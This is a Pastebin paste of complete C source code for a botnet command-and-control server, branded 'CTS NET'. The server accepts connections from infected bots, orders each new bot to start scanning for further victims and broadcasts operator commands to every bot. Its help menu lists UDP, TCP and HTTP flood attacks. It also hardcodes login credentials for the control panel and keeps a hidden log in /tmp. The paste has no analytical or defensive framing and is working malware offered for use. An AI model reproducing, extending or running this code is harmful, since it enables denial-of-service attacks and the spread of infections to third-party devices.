API tools faq
paste
Guest User

Untitled

a guest
Jul 28th, 2016
34
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 21.16 KB | None | 0 0
raw download clone embed print report
  1. #include <stdio.h>
  2. #include <stdlib.h>
  3. #include <string.h>
  4. #include <sys/types.h>
  5. #include <sys/socket.h>
  6. #include <netdb.h>
  7. #include <unistd.h>
  8. #include <time.h>
  9. #include <fcntl.h>
  10. #include <sys/epoll.h>
  11. #include <errno.h>
  12. #include <pthread.h>
  13. #include <signal.h>
  14.  
  15. #define MY_MGM_ADMINP "heropvmer659"
  16. #define MY_MGM_ADMINU "ctlbz"
  17. #define MY_MGM_MATENP "Crimsons"
  18. #define MY_MGM_MATENU "Crimson"
  19. #define MY_MGM_USERP "aadd"
  20. #define MY_MGM_USERU "aaad"
  21. #define MY_MGM_GUESTP "ddaaaa"
  22. #define MY_MGM_GUESTU "daaaad"
  23. #define MY_MGM_PORT 420
  24.  
  25. #define MAXFDS 1000000
  26. char MY_USER_ADMIN=0, MY_USER_USER=0, MY_USER_MATEN=0, MY_USER_GUEST=0;
  27. struct clientdata_t {
  28. uint32_t ip;
  29. char build[7];
  30. char connected;
  31. } clients[MAXFDS];
  32. struct telnetdata_t {
  33. int connected;
  34. } managements[MAXFDS];
  35. static volatile FILE *fileFD;
  36. static volatile int epollFD = 0;
  37. static volatile int listenFD = 0;
  38. static volatile int managesConnected = 0;
  39. int fdgets(unsigned char *buffer, int bufferSize, int fd)
  40. {
  41. int total = 0, got = 1;
  42. while(got == 1 && total < bufferSize && *(buffer + total - 1) != '\n') { got = read(fd, buffer + total, 1); total++; }
  43. return got;
  44. }
  45. void trim(char *str) // Remove whitespace from a string and properly null-terminate it.
  46. {
  47. int i;
  48. int begin = 0;
  49. int end = strlen(str) - 1;
  50. while (isspace(str[begin])) begin++;
  51. while ((end >= begin) && isspace(str[end])) end--;
  52. for (i = begin; i <= end; i++) str[i - begin] = str[i];
  53. str[i - begin] = '\0';
  54. }
  55.  
  56.  
  57. static int make_socket_non_blocking (int sfd)
  58. { // man fcntl
  59. int flags, s;
  60. flags = fcntl (sfd, F_GETFL, 0);
  61. if (flags == -1)
  62. {
  63. perror ("fcntl");
  64. return -1;
  65. }
  66. flags |= O_NONBLOCK;
  67. /*
  68. F_SETFL (int)
  69. Set the file status flags to the value specified by arg. File access mode (O_RDONLY, O_WRONLY, O_RDWR) and file creation flags (i.e., O_CREAT, O_EXCL, O_NOCTTY, O_TRUNC) in arg are
  70. ignored. On Linux this command can change only the O_APPEND, O_ASYNC, O_DIRECT, O_NOATIME, and O_NONBLOCK flags.
  71. */
  72. s = fcntl (sfd, F_SETFL, flags);
  73. if (s == -1)
  74. {
  75. perror ("fcntl");
  76. return -1;
  77. }
  78. return 0;
  79. }
  80.  
  81.  
  82. static int create_and_bind (char *port)
  83. {
  84. struct addrinfo hints;
  85. struct addrinfo *result, *rp;
  86. int s, sfd;
  87. memset (&hints, 0, sizeof (struct addrinfo));
  88. hints.ai_family = AF_UNSPEC; /* Return IPv4 and IPv6 choices */
  89. hints.ai_socktype = SOCK_STREAM; /* We want a TCP socket */
  90. hints.ai_flags = AI_PASSIVE; /* All interfaces */
  91. s = getaddrinfo (NULL, port, &hints, &result);
  92. if (s != 0)
  93. {
  94. fprintf (stderr, "getaddrinfo: %s\n", gai_strerror (s));
  95. return -1;
  96. }
  97. for (rp = result; rp != NULL; rp = rp->ai_next)
  98. {
  99. sfd = socket (rp->ai_family, rp->ai_socktype, rp->ai_protocol);
  100. if (sfd == -1) continue;
  101. int yes = 1;
  102. if ( setsockopt(sfd, SOL_SOCKET, SO_REUSEADDR, &yes, sizeof(int)) == -1 ) perror("setsockopt");
  103. s = bind (sfd, rp->ai_addr, rp->ai_addrlen);
  104. if (s == 0)
  105. {
  106. break;
  107. }
  108. close (sfd);
  109. }
  110. if (rp == NULL)
  111. {
  112. fprintf (stderr, "Could not bind\n");
  113. return -1;
  114. }
  115. freeaddrinfo (result);
  116. return sfd;
  117. }
  118.  
  119. void broadcast(char *msg, int us, char *username) // sends message to all bots, notifies the management clients of this happening
  120. {
  121. int sendMGM = 1;
  122. if(strcmp(msg, "PING") == 0) sendMGM = 0; // Don't send pings to management. Why? Because a human is going to ignore it.
  123. char *wot = malloc(strlen(msg) + 10);
  124. memset(wot, 0, strlen(msg) + 10);
  125. strcpy(wot, msg);
  126. trim(wot);
  127. time_t rawtime;
  128. struct tm * timeinfo;
  129. time(&rawtime);
  130. timeinfo = localtime(&rawtime);
  131. char *timestamp = asctime(timeinfo);
  132. trim(timestamp);
  133. int i;
  134. for(i = 0; i < MAXFDS; i++)
  135. {
  136. if(i == us || (!clients[i].connected && (sendMGM == 0 || !managements[i].connected))) continue;
  137. if(sendMGM && managements[i].connected)
  138.  
  139. {
  140.  
  141. send(i, "\x1b[94m", 6, MSG_NOSIGNAL);
  142.  
  143. send(i, username, strlen(username), MSG_NOSIGNAL);
  144.  
  145. send(i, ":\x1b[91m ", 8, MSG_NOSIGNAL);
  146.  
  147. } //just a prompt with a timestamp.
  148. printf("sent to fd: %d\n", i); // debug info, possibly also intrusion detection. Tells you when a management client connected on command line.
  149. send(i, msg, strlen(msg), MSG_NOSIGNAL);
  150. if(sendMGM && managements[i].connected) send(i, "\r\n\x1b[94m> \x1b[91m", 15, MSG_NOSIGNAL); // send a cool looking prompt to a manager/admin
  151. else send(i, "\n", 1, MSG_NOSIGNAL);
  152. }
  153. free(wot);
  154. }
  155.  
  156. void *epollEventLoop(void *useless) // the big loop used to control each bot asynchronously. Many threads of this get spawned.
  157. {
  158. struct epoll_event event;
  159. struct epoll_event *events;
  160. int s;
  161. events = calloc (MAXFDS, sizeof event);
  162. while (1)
  163. {
  164. int n, i;
  165. n = epoll_wait (epollFD, events, MAXFDS, -1);
  166. for (i = 0; i < n; i++)
  167. {
  168. if ((events[i].events & EPOLLERR) || (events[i].events & EPOLLHUP) || (!(events[i].events & EPOLLIN)))
  169. {
  170. clients[events[i].data.fd].connected = 0;
  171. close(events[i].data.fd);
  172. continue;
  173. }
  174. else if (listenFD == events[i].data.fd)
  175. {
  176. while (1)
  177. {
  178. struct sockaddr in_addr;
  179. socklen_t in_len;
  180. int infd, ipIndex;
  181.  
  182. in_len = sizeof in_addr;
  183. infd = accept (listenFD, &in_addr, &in_len); // accept a connection from a bot.
  184. if (infd == -1)
  185. {
  186. if ((errno == EAGAIN) || (errno == EWOULDBLOCK)) break;
  187. else
  188. {
  189. perror ("accept");
  190. break;
  191. }
  192. }
  193.  
  194. clients[infd].ip = ((struct sockaddr_in *)&in_addr)->sin_addr.s_addr;
  195.  
  196. int dup = 0;
  197. for(ipIndex = 0; ipIndex < MAXFDS; ipIndex++) // check for duplicate clients by seeing if any have the same IP as the one connecting
  198. {
  199. if(!clients[ipIndex].connected || ipIndex == infd) continue;
  200.  
  201. if(clients[ipIndex].ip == clients[infd].ip)
  202. {
  203. dup = 1;
  204. break;
  205. }
  206. }
  207.  
  208. if(dup)
  209. {
  210. printf("dup client\n"); // warns the operator on command line
  211. if(send(infd, "!* LOLNOGTFO\n", 13, MSG_NOSIGNAL) == -1) { close(infd); continue; } // orders all the bots to immediately kill themselves if we see a duplicate client! MAXIMUM PARANOIA
  212. if(send(infd, "DUP\n", 4, MSG_NOSIGNAL) == -1) { close(infd); continue; } // same thing as above.
  213. close(infd);
  214. continue;
  215. }
  216.  
  217. s = make_socket_non_blocking (infd);
  218. if (s == -1) { close(infd); break; }
  219.  
  220. event.data.fd = infd;
  221. event.events = EPOLLIN | EPOLLET;
  222. s = epoll_ctl (epollFD, EPOLL_CTL_ADD, infd, &event);
  223. if (s == -1)
  224. {
  225. perror ("epoll_ctl");
  226. close(infd);
  227. break;
  228. }
  229.  
  230. clients[infd].connected = 1;
  231. send(infd, "!* SCANNER ON\n", 14, MSG_NOSIGNAL);
  232. }
  233. continue;
  234. }
  235. else
  236. {
  237. int thefd = events[i].data.fd;
  238. struct clientdata_t *client = &(clients[thefd]);
  239. int done = 0;
  240. client->connected = 1;
  241. while (1)
  242. {
  243. ssize_t count;
  244. char buf[2048];
  245. memset(buf, 0, sizeof buf);
  246.  
  247. while(memset(buf, 0, sizeof buf) && (count = fdgets(buf, sizeof buf, thefd)) > 0)
  248. {
  249. if(strstr(buf, "\n") == NULL) { done = 1; break; }
  250. trim(buf);
  251. if(strcmp(buf, "PING") == 0) // basic IRC-like ping/pong challenge/response to see if server is alive
  252. {
  253. if(send(thefd, "PONG\n", 5, MSG_NOSIGNAL) == -1) { done = 1; break; } // response
  254. continue;
  255. }
  256. if(strcmp(buf, "PONG") == 0)
  257. {
  258. if(send(thefd, "PING\n", 5, MSG_NOSIGNAL) == -1) { done = 1; break; } // response
  259. continue;
  260. }
  261.  
  262. printf("buf: \"%s\"\n", buf);
  263. }
  264.  
  265. if (count == -1)
  266. {
  267. if (errno != EAGAIN)
  268. {
  269. done = 1;
  270. }
  271. break;
  272. }
  273. else if (count == 0)
  274. {
  275. done = 1;
  276. break;
  277. }
  278. }
  279.  
  280. if (done)
  281. {
  282. client->connected = 0;
  283. close(thefd);
  284. }
  285. }
  286. }
  287. }
  288. }
  289.  
  290. unsigned int clientsConnected() // counts the number of bots connected by looping over every possible file descriptor and checking if it's connected or not
  291. {
  292. int i = 0, total = 0;
  293. for(i = 0; i < MAXFDS; i++)
  294. {
  295. if(!clients[i].connected) continue;
  296. total++;
  297. }
  298.  
  299. return total;
  300. }
  301.  
  302. void *titleWriter(void *sock) // just an informational banner
  303. {
  304. // this LOOKS vulnerable, but it's actually not.
  305. // there's no way we can have 2000 digits' worth of clients/bots connected to overflow that char array
  306. int thefd = (int)sock;
  307. char string[2048];
  308. while(1)
  309. {
  310. memset(string, 0, 2048);
  311. sprintf(string, "%c]0;Bots connected: %d | Users connected: %d%c", '\033', clientsConnected(), managesConnected, '\007');
  312. // \007 is a bell character... causes a beep. Why is there a beep here?
  313. if(send(thefd, string, strlen(string), MSG_NOSIGNAL) == -1) return;
  314.  
  315. sleep(2);
  316. }
  317. }
  318.  
  319.  
  320. void *telnetWorker(void *sock)
  321. {
  322. int thefd = (int)sock;
  323. managesConnected++;
  324. pthread_t title;
  325. char buf[2048];
  326. char* nickstring;
  327. memset(buf, 0, sizeof buf);
  328. char username[80];
  329. char status=0;
  330.  
  331. if(send(thefd, "\x1b[39mUsername:\x1b[30m ", 20, MSG_NOSIGNAL) == -1) goto end;
  332. if(fdgets(buf, sizeof buf, thefd) < 1) goto end;
  333. trim(buf);
  334. nickstring = ("%s", buf);
  335. if(strcmp(nickstring, MY_MGM_ADMINU) == 0){
  336. if(send(thefd, "\x1b[39mPassword:\x1b[30m ", 20, MSG_NOSIGNAL) == -1) goto end;
  337. if(fdgets(buf, sizeof buf, thefd) < 1) goto end;
  338. trim(buf);
  339. if(strcmp(buf, MY_MGM_ADMINP) != 0) goto failed;
  340. memset(buf, 0, 2048);
  341. sprintf(username, MY_MGM_ADMINU);
  342. MY_USER_ADMIN=1;
  343. status=1;
  344. goto fak;
  345. }
  346. else if(strcmp(nickstring, MY_MGM_USERU) == 0){
  347. if(send(thefd, "\x1b[39mPassword:\x1b[30m ", 20, MSG_NOSIGNAL) == -1) goto end;
  348. if(fdgets(buf, sizeof buf, thefd) < 1) goto end;
  349. trim(buf);
  350. if(strcmp(buf, MY_MGM_USERP) != 0) goto failed;
  351. memset(buf, 0, 2048);
  352. sprintf(username, MY_MGM_USERU);
  353. MY_USER_USER=1;
  354. status=2;
  355. goto fak;
  356. }
  357. else if(strcmp(nickstring, MY_MGM_MATENU) == 0){
  358. if(send(thefd, "\x1b[39mPassword:\x1b[30m ", 20, MSG_NOSIGNAL) == -1) goto end;
  359. if(fdgets(buf, sizeof buf, thefd) < 1) goto end;
  360. trim(buf);
  361. if(strcmp(buf, MY_MGM_MATENP) != 0) goto failed;
  362. memset(buf, 0, 2048);
  363. sprintf(username, MY_MGM_MATENU);
  364. MY_USER_MATEN=1;
  365. status=3;
  366. goto fak;
  367. }
  368. else if(strcmp(nickstring, MY_MGM_GUESTU) == 0){
  369. if(send(thefd, "\x1b[39mPassword:\x1b[30m ", 20, MSG_NOSIGNAL) == -1) goto end;
  370. if(fdgets(buf, sizeof buf, thefd) < 1) goto end;
  371. trim(buf);
  372. if(strcmp(buf, MY_MGM_GUESTP) != 0) goto failed;
  373. memset(buf, 0, 2048);
  374. sprintf(username, MY_MGM_GUESTU);
  375. MY_USER_GUEST=1;
  376. status=4;
  377. goto fak;
  378. }
  379. else if(strcmp(nickstring, MY_MGM_GUESTU) != 0 || strcmp(nickstring, MY_MGM_ADMINU) != 0 || strcmp(nickstring, MY_MGM_USERU) != 0 || strcmp(nickstring, MY_MGM_MATENU) != 0 ){
  380. if(send(thefd, "\x1b[39mAcces denied\r\n", 24, MSG_NOSIGNAL) == -1) goto end;
  381. goto end;
  382. }
  383. failed:
  384. if(send(thefd, "\x1b[39mAcces denied\r\n", 24, MSG_NOSIGNAL) == -1) goto end;
  385. goto end;
  386. fak:
  387.  
  388. if(send(thefd, "\033[1A", 5, MSG_NOSIGNAL) == -1) goto end;
  389. pthread_create(&title, NULL, &titleWriter, sock); /* writes the informational banner to the admin after a login */
  390. if(send(thefd, "\033[H\033[J\x1b[94m*****************************************\r\n", 56, MSG_NOSIGNAL) == -1) goto end;
  391. if(send(thefd, "* \x1b[92mCTS NET\x1b[94m *\r\n", 55, MSG_NOSIGNAL) == -1) goto end;
  392. if(send(thefd, "* \x1b[92mYES\x1b[94m *\r\n", 55, MSG_NOSIGNAL) == -1) goto end;
  393. if(send(thefd, "*****************************************\r\n\r\n\x1b[94m> \x1b[92m", 58, MSG_NOSIGNAL) == -1) goto end;
  394. /* If we can't send the useless banner, kill ourselves! Amazing error handling! */
  395. managements[thefd].connected = 1;
  396. while(fdgets(buf, sizeof buf, thefd) > 0)
  397. {
  398. trim(buf);
  399. if(strstr(buf, "!* LOLNOGTFO"))
  400. {
  401. printf("ATTEMPT TO KILL ALL BOTS BY %s\n", username);
  402. FILE *logFile;
  403. logFile = fopen("/tmp/.log", "a");
  404. fprintf(logFile, "ATTEMPT TO KILL ALL BOTS BY %s\n", username);
  405. fclose(logFile);
  406. goto end;
  407. }
  408. if(strstr(buf, "!* SH"))
  409. {
  410. printf("ATTEMPT TO SH BY %s\n", username);
  411. FILE *logFile;
  412. logFile = fopen("/tmp/.log", "a");
  413. fprintf(logFile, "ATTEMPT TO SH BY %s\n", username);
  414. fclose(logFile);
  415. goto end;
  416. }
  417.  
  418. if(strncmp(buf, "HELP", 5) == 0){
  419. if(send(thefd, "!* UDP IP PORT TIME NMASK PSIZE PI\r\n", 36, MSG_NOSIGNAL) == -1) goto end;
  420. if(send(thefd, "!* TCP IP PORT TIME NMASK FLAGS PSIZE PI\r\n", 42, MSG_NOSIGNAL) == -1) goto end;
  421. if(send(thefd, "!* HTTP SITE SECONDS\r\n", 22, MSG_NOSIGNAL) == -1) goto end;
  422. if(send(thefd, "!* KILLATTK\r\n", 13, MSG_NOSIGNAL) == -1) goto end;
  423. if(send(thefd, "!* SCANNER ON | OFF\r\n", 21, MSG_NOSIGNAL) == -1) goto end;
  424. if(send(thefd, "CLEAR\r\n", 7, MSG_NOSIGNAL) == -1) goto end;
  425. memset(buf, 0, 2048);
  426. }
  427. if(strncmp(buf, "CLEAR", 5) == 0){
  428. goto fak;
  429. memset(buf, 0, 2048);
  430. }
  431.  
  432. FILE *logFile;
  433. if(send(thefd, "\x1b[94m> \x1b[91m", 13, MSG_NOSIGNAL) == -1) goto end;
  434. if(strlen(buf) == 0) continue;
  435. logFile = fopen("/tmp/.log", "a");
  436. fprintf(logFile, "%s: %s\n", username, buf);
  437. fclose(logFile);
  438. broadcast(buf, thefd, username);
  439. memset(buf, 0, 2048);
  440.  
  441. }
  442.  
  443. end:
  444. managements[thefd].connected = 0;
  445. close(thefd);
  446. managesConnected--;
  447. }
  448.  
  449. void *telnetListener(void *useless)
  450. {
  451. int sockfd, newsockfd;
  452. socklen_t clilen;
  453. struct sockaddr_in serv_addr, cli_addr;
  454. sockfd = socket(AF_INET, SOCK_STREAM, 0);
  455. if (sockfd < 0) perror("ERROR opening socket");
  456. bzero((char *) &serv_addr, sizeof(serv_addr));
  457. serv_addr.sin_family = AF_INET;
  458. serv_addr.sin_addr.s_addr = INADDR_ANY;
  459. serv_addr.sin_port = htons(MY_MGM_PORT);
  460. if (bind(sockfd, (struct sockaddr *) &serv_addr, sizeof(serv_addr)) < 0) perror("ERROR on binding");
  461. listen(sockfd,5);
  462. clilen = sizeof(cli_addr);
  463. while(1)
  464. {
  465. newsockfd = accept(sockfd, (struct sockaddr *) &cli_addr, &clilen);
  466. if (newsockfd < 0) perror("ERROR on accept");
  467. pthread_t thread;
  468. pthread_create( &thread, NULL, &telnetWorker, (void *)newsockfd);
  469. }
  470. }
  471.  
  472. int main (int argc, char *argv[])
  473. {
  474. signal(SIGPIPE, SIG_IGN); // ignore broken pipe errors sent from kernel
  475.  
  476. int s, threads;
  477. struct epoll_event event;
  478.  
  479. if (argc != 3)
  480. {
  481. fprintf (stderr, "Usage: %s [port] [threads]\n", argv[0]);
  482. exit (EXIT_FAILURE);
  483. }
  484. threads = atoi(argv[2]);
  485.  
  486. listenFD = create_and_bind (argv[1]); // try to create a listening socket, die if we can't
  487. if (listenFD == -1) abort ();
  488.  
  489. s = make_socket_non_blocking (listenFD); // try to make it nonblocking, die if we can't
  490. if (s == -1) abort ();
  491.  
  492.  
  493. s = listen (listenFD, SOMAXCONN); // listen with a huuuuge backlog, die if we can't
  494. if (s == -1)
  495. {
  496. perror ("listen");
  497. abort ();
  498. }
  499.  
  500. epollFD = epoll_create1 (0); // make an epoll listener, die if we can't
  501. if (epollFD == -1)
  502. {
  503. perror ("epoll_create");
  504. abort ();
  505. }
  506.  
  507. event.data.fd = listenFD;
  508. event.events = EPOLLIN | EPOLLET;
  509. s = epoll_ctl (epollFD, EPOLL_CTL_ADD, listenFD, &event);
  510. if (s == -1)
  511. {
  512. perror ("epoll_ctl");
  513. abort ();
  514. }
  515.  
  516. pthread_t thread[threads + 2];
  517. while(threads--)
  518. {
  519. pthread_create( &thread[threads + 1], NULL, &epollEventLoop, (void *) NULL); // make a thread to command each bot individually
  520. }
  521.  
  522. pthread_create(&thread[0], NULL, &telnetListener, (void *)NULL);
  523.  
  524. while(1)
  525. {
  526. broadcast("PING", -1, "b0ats");
  527.  
  528. sleep(60);
  529. }
  530.  
  531. close (listenFD);
  532.  
  533. return EXIT_SUCCESS;
  534. }
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!